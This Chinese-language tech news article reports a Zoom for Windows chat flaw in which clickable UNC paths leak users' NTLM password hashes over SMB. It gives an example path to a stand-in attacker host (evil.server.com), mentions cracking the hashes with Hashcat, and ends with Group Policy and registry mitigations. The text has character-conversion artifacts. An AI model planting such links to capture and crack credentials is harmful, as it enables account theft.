近日，Windows 版 Zoom 客戶端爆出了容易受到 NUC 路徑注入攻擊的安全漏洞。作為一款音視頻會(huì)議應(yīng)用，Zoom 還允許用戶在聊天界面通過發(fā)送文本消息來互相交流。然而外媒 Bleeping Computer 指出，攻擊者可利用聊天模塊的漏洞，竊取點(diǎn)擊了相關(guān)鏈接的用戶的 Windows 登陸憑據(jù)。

【UNC 注入示例】

發(fā)送聊天消息時(shí)，所有發(fā)送的 URL 都將經(jīng)過轉(zhuǎn)換，以便群內(nèi)其他成員點(diǎn)擊，繼而在默認(rèn)的瀏覽器中打開網(wǎng)頁。

然而安全研究人員 @ _g0dmode 發(fā)現(xiàn)，Zoom 客戶端竟然還將Windows網(wǎng)絡(luò) UNC 路徑，也轉(zhuǎn)換成了聊天消息中可單擊的鏈接。

如圖所示，常規(guī) URL 和 NUC 路徑(\evil.server.comimagescat.jpg)，都被轉(zhuǎn)換成了聊天消息中的可點(diǎn)擊鏈接。

【捕獲的 NTLM 密碼哈希值】

若用戶單擊 UNC 路徑鏈接，則 Windows 將嘗試使用 SMB 文件共享協(xié)議連接到遠(yuǎn)程站點(diǎn)，以打開遠(yuǎn)程路徑中的 cat.jpg 文件。

默認(rèn)情況下，Windows 將發(fā)送用戶的登錄名和 NTLM 密碼哈希值，但稍有經(jīng)驗(yàn)的攻擊者均可借助 Hashcat 之類的免費(fèi)工具來逆向運(yùn)算。

【簡單密碼可在 16 秒內(nèi)被暴力破解】

安全研究人員 Matthew Hickey(@ HackerFantastic)實(shí)測發(fā)現(xiàn)，其能夠在 Zoom 中順利注入，并且可以借助當(dāng)前的民用級 GPU 和 CPU 來快速破解。

除了竊取 Windows 登陸憑據(jù)，Hickey 還向 Bleeping Computer 透露，通過點(diǎn)擊鏈接的方式，UNC 注入還適用于啟動(dòng)本地計(jì)算機(jī)上的程序(比如 CMD 命令提示符)。

【程序運(yùn)行提示】

慶幸的是，Windows 會(huì)在程序被執(zhí)行前發(fā)出是否允許其運(yùn)行的提示。想要堵上這一漏洞，Zoom 必須阻止 Windows 客戶端的 UNC 路徑轉(zhuǎn)換功能(屏蔽部分可點(diǎn)擊的超鏈接)。

據(jù)悉，Hickey 已經(jīng)在 Twitter 上向 Zoom 官方發(fā)去了有關(guān)該安全漏洞的通知，但目前尚不清楚該公司已采取怎樣的行動(dòng)。

注重安全的客戶，可在官方補(bǔ)丁發(fā)布前，通過組策略來限制向遠(yuǎn)程服務(wù)器傳出 NTLM 通信(參考如下操作)：

計(jì)算機(jī)配置 -> Windows 設(shè)置 -> 安全設(shè)置 -> 本地策略 -> 安全選項(xiàng) -> 網(wǎng)絡(luò)安全：限制NTLM -> 發(fā)送到遠(yuǎn)程服務(wù)器的 NTLM 通信(然后全部配置為拒絕)。

需要注意的是，如果在已經(jīng)加入相關(guān)域的計(jì)算機(jī)上配置上述組策略時(shí)，可能會(huì)在嘗試訪問共享時(shí)遇到問題。

如果是無權(quán)訪問組策略設(shè)置 Windows 10 家庭版用戶，亦可使用注冊表編輯器來完成相關(guān)限制操作(dword 配置為 2)：

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaMSV1_0]"RestrictSendingNTLMTraffic"=dword:00000002

如需正確創(chuàng)建此鍵值，Windows 用戶記得以管理員身份來啟動(dòng)注冊表編輯器。

若日后有必要恢復(fù)默認(rèn)發(fā)送 NTLM 憑據(jù)的 Windows 行為，也只需刪除對應(yīng)的 RestrictSendingNTLMTraffic 鍵值。